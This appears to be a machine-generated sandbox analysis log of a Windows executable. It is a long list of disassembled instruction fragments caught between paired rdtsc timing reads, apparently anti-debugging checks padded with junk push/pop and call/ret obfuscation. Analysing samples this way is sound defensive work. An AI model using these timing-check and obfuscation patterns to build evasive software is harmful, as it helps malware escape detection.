                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6AB63 second address: F6AB81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D1h 0x00000007 jno 00007FFAACBEF8C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6AB81 second address: F6ABB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007FFAAD0A8F27h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FFAAD0A8F26h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6ABB9 second address: F6ABDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FFAACBEF8D4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c je 00007FFAACBEF8C6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6B3D1 second address: F6B3D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6B51D second address: F6B523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6B523 second address: F6B52E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6B52E second address: F6B532 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6F18B second address: F6F1AF instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FFAAD0A8F2Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6F1AF second address: F6F1B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6F1B5 second address: F6F1DC instructions: 0x00000000 rdtsc 0x00000002 jns 00007FFAAD0A8F16h 0x00000008 jmp 00007FFAAD0A8F1Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FFAAD0A8F1Ah 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F6F1DC second address: F6F1F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FFAACBEF8CEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jno 00007FFAACBEF8C6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F73007 second address: F73018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 pop edx 0x00000009 popad 0x0000000a push eax 0x0000000b push edi 0x0000000c pushad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F73699 second address: F7369E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F71EDC second address: F71EFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007FFAAD0A8F16h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F71EFA second address: F71F13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F78C55 second address: F78C77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jns 00007FFAAD0A8F16h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FFAAD0A8F23h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F34325 second address: F34329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F783DF second address: F78411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFAAD0A8F22h 0x00000009 pop esi 0x0000000a jmp 00007FFAAD0A8F21h 0x0000000f popad 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jnp 00007FFAAD0A8F16h 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F78411 second address: F78420 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FFAACBEF8C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F78981 second address: F78987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F78987 second address: F7899E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop ebx 0x0000000b popad 0x0000000c jnp 00007FFAACBEF8D0h 0x00000012 push ebx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7BFE8 second address: F7BFEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7C595 second address: F7C59F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FFAACBEF8C6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7C9C4 second address: F7C9CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7C9CA second address: F7C9D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7CA23 second address: F7CA28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7CF76 second address: F7CF7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7DD0C second address: F7DD19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F803C9 second address: F803D3 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FFAACBEF8CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F803D3 second address: F803E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jo 00007FFAAD0A8F24h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F803E4 second address: F8046F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FFAACBEF8C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b call 00007FFAACBEF8CEh 0x00000010 mov dword ptr [ebp+1244E84Ch], eax 0x00000016 pop esi 0x00000017 push 00000000h 0x00000019 call 00007FFAACBEF8CEh 0x0000001e pushad 0x0000001f mov bh, 97h 0x00000021 jl 00007FFAACBEF8C6h 0x00000027 popad 0x00000028 pop edi 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebp 0x0000002e call 00007FFAACBEF8C8h 0x00000033 pop ebp 0x00000034 mov dword ptr [esp+04h], ebp 0x00000038 add dword ptr [esp+04h], 0000001Ch 0x00000040 inc ebp 0x00000041 push ebp 0x00000042 ret 0x00000043 pop ebp 0x00000044 ret 0x00000045 mov esi, 6BB77350h 0x0000004a xchg eax, ebx 0x0000004b jmp 00007FFAACBEF8D9h 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 jg 00007FFAACBEF8C6h 0x0000005a pop eax 0x0000005b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F81B45 second address: F81B49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F82656 second address: F8265C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8265C second address: F82661 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F846B8 second address: F846BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F846BE second address: F846C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F846C2 second address: F846C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F846C6 second address: F846E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FFAAD0A8F1Bh 0x0000000c push esi 0x0000000d pop esi 0x0000000e jnc 00007FFAAD0A8F16h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F85C1E second address: F85C37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F85C37 second address: F85C3C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F85C3C second address: F85C49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F87AD3 second address: F87B5C instructions: 0x00000000 rdtsc 0x00000002 jo 00007FFAAD0A8F1Ch 0x00000008 jc 00007FFAAD0A8F16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007FFAAD0A8F18h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 00000019h 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d xor di, 439Fh 0x00000032 mov ebx, dword ptr [ebp+122D2C65h] 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ebp 0x0000003d call 00007FFAAD0A8F18h 0x00000042 pop ebp 0x00000043 mov dword ptr [esp+04h], ebp 0x00000047 add dword ptr [esp+04h], 0000001Dh 0x0000004f inc ebp 0x00000050 push ebp 0x00000051 ret 0x00000052 pop ebp 0x00000053 ret 0x00000054 mov bx, CF62h 0x00000058 push 00000000h 0x0000005a cld 0x0000005b xchg eax, esi 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007FFAAD0A8F29h 0x00000063 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F87B5C second address: F87B71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F88B10 second address: F88B56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 clc 0x0000000a push 00000000h 0x0000000c sub bl, 00000078h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007FFAAD0A8F18h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b push eax 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f push esi 0x00000030 pop esi 0x00000031 jmp 00007FFAAD0A8F1Ah 0x00000036 popad 0x00000037 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F89A9C second address: F89AA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F89AA2 second address: F89AA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F89AA8 second address: F89AAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F89AAC second address: F89B0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007FFAAD0A8F18h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push eax 0x0000002a call 00007FFAAD0A8F18h 0x0000002f pop eax 0x00000030 mov dword ptr [esp+04h], eax 0x00000034 add dword ptr [esp+04h], 00000015h 0x0000003c inc eax 0x0000003d push eax 0x0000003e ret 0x0000003f pop eax 0x00000040 ret 0x00000041 push 00000000h 0x00000043 add edi, dword ptr [ebp+122D2F65h] 0x00000049 xchg eax, esi 0x0000004a je 00007FFAAD0A8F1Eh 0x00000050 push ebx 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8AB39 second address: F8AB5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFAACBEF8D9h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F85D99 second address: F85D9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F86D3F second address: F86D45 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F88D60 second address: F88D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8ACB4 second address: F8ACBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FFAACBEF8C6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F88D64 second address: F88D73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8ACBE second address: F8ACC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F85E46 second address: F85E4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8BCF3 second address: F8BCFD instructions: 0x00000000 rdtsc 0x00000002 js 00007FFAACBEF8CCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8C957 second address: F8C95B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F85E4B second address: F85E55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FFAACBEF8C6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F91A28 second address: F91A2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F938D1 second address: F938D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8FB54 second address: F8FB58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F90B90 second address: F90BC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFAACBEF8D8h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8EBBF second address: F8EC61 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FFAAD0A8F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push dword ptr fs:[00000000h] 0x00000015 mov di, bx 0x00000018 mov dword ptr fs:[00000000h], esp 0x0000001f push 00000000h 0x00000021 push esi 0x00000022 call 00007FFAAD0A8F18h 0x00000027 pop esi 0x00000028 mov dword ptr [esp+04h], esi 0x0000002c add dword ptr [esp+04h], 00000019h 0x00000034 inc esi 0x00000035 push esi 0x00000036 ret 0x00000037 pop esi 0x00000038 ret 0x00000039 mov eax, dword ptr [ebp+122D0449h] 0x0000003f sub dword ptr [ebp+12471493h], eax 0x00000045 push FFFFFFFFh 0x00000047 push 00000000h 0x00000049 push ebp 0x0000004a call 00007FFAAD0A8F18h 0x0000004f pop ebp 0x00000050 mov dword ptr [esp+04h], ebp 0x00000054 add dword ptr [esp+04h], 00000019h 0x0000005c inc ebp 0x0000005d push ebp 0x0000005e ret 0x0000005f pop ebp 0x00000060 ret 0x00000061 cld 0x00000062 mov ebx, dword ptr [ebp+122D2AF9h] 0x00000068 mov bl, CCh 0x0000006a nop 0x0000006b pushad 0x0000006c jmp 00007FFAAD0A8F25h 0x00000071 push eax 0x00000072 push edx 0x00000073 jmp 00007FFAAD0A8F21h 0x00000078 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F91BB0 second address: F91BC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFAACBEF8D0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F92AC8 second address: F92AD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FFAAD0A8F16h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8FB58 second address: F8FBB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 cmc 0x0000000a pushad 0x0000000b push edi 0x0000000c mov bl, ah 0x0000000e pop esi 0x0000000f mov esi, 1BF22399h 0x00000014 popad 0x00000015 push dword ptr fs:[00000000h] 0x0000001c push 00000000h 0x0000001e push edx 0x0000001f call 00007FFAACBEF8C8h 0x00000024 pop edx 0x00000025 mov dword ptr [esp+04h], edx 0x00000029 add dword ptr [esp+04h], 00000016h 0x00000031 inc edx 0x00000032 push edx 0x00000033 ret 0x00000034 pop edx 0x00000035 ret 0x00000036 add di, 1D06h 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 mov dword ptr [ebp+122D2444h], edi 0x00000048 mov eax, dword ptr [ebp+122D05ADh] 0x0000004e adc bx, D75Ch 0x00000053 push FFFFFFFFh 0x00000055 nop 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a popad 0x0000005b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8EC61 second address: F8EC6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F92AD2 second address: F92AE5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FFAACBEF8C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8EC6F second address: F8EC73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8EC73 second address: F8EC79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F949DF second address: F94A73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 nop 0x00000006 push edi 0x00000007 mov dword ptr [ebp+122D3214h], ebx 0x0000000d pop ebx 0x0000000e push dword ptr fs:[00000000h] 0x00000015 mov dword ptr [ebp+1244C007h], edi 0x0000001b mov dword ptr fs:[00000000h], esp 0x00000022 mov ebx, 35B0DF8Dh 0x00000027 mov dword ptr [ebp+1244B300h], esi 0x0000002d mov eax, dword ptr [ebp+122D0AEDh] 0x00000033 push 00000000h 0x00000035 push edx 0x00000036 call 00007FFAAD0A8F18h 0x0000003b pop edx 0x0000003c mov dword ptr [esp+04h], edx 0x00000040 add dword ptr [esp+04h], 00000017h 0x00000048 inc edx 0x00000049 push edx 0x0000004a ret 0x0000004b pop edx 0x0000004c ret 0x0000004d sub dword ptr [ebp+12475E90h], edi 0x00000053 push FFFFFFFFh 0x00000055 push 00000000h 0x00000057 push ebx 0x00000058 call 00007FFAAD0A8F18h 0x0000005d pop ebx 0x0000005e mov dword ptr [esp+04h], ebx 0x00000062 add dword ptr [esp+04h], 0000001Ah 0x0000006a inc ebx 0x0000006b push ebx 0x0000006c ret 0x0000006d pop ebx 0x0000006e ret 0x0000006f mov ebx, edi 0x00000071 nop 0x00000072 push eax 0x00000073 push edx 0x00000074 jmp 00007FFAAD0A8F23h 0x00000079 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F94A73 second address: F94A83 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F94A83 second address: F94A88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9915B second address: F99160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F4188B second address: F418B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F25h 0x00000007 jno 00007FFAAD0A8F1Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push esi 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F418B8 second address: F418C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 ja 00007FFAACBEF8C6h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA0659 second address: FA065F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9FE4B second address: F9FE56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FFAACBEF8C6h 0x0000000a pop edi 0x0000000b rdtsc
